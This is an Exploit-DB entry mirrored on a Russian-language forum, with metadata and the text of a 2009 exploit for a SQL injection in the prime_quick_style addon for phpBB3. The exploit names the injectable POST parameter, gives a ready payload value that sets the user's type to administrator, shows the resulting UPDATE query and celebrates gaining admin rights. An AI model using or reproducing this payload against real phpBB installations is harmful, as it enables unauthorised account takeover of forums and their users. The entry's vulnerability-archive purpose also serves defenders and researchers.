- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9569
- Проверка EDB
-
- Пройдено
- Автор
- -SMOG-
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-3052
- Дата публикации
- 2009-09-01
Код:
##########################################################################
#
# phpBB3 addon prime_quick_style GetAdmin Exploit
#
# Vulnerability found and exploited by -SmoG-
#
# target file: prime_quick_style.php
#
#
# vuln: POST parameter "prime_quick_style" is injectable.
# source: http://www.phpbb.com/community/viewtopic.php?f=70&t=692625
#
# HowTo: after login, go to "./ucp.php" and manipulate the content from the "prime_quick_style"-parameter.
# example: prime_quick_style = "5,user_type = 3, user_permissions = ''"
#
# query will be look like this: "UPDATE USER_TABLE SET user_style = ANY_STYLE(integer), user_type = 3, user_permissions = '' WHERE user_id = YourId"
#
# gratz, now u will be an admin :)
#
# --- greetz to Pronoobz.org --- AbiDez, ChinaSun and ~dp~ || Thanks you a lot! ---
#
#
# -( by -SmoG- )-
##########################################################################
# milw0rm.com [2009-09-01]- Источник
- www.exploit-db.com
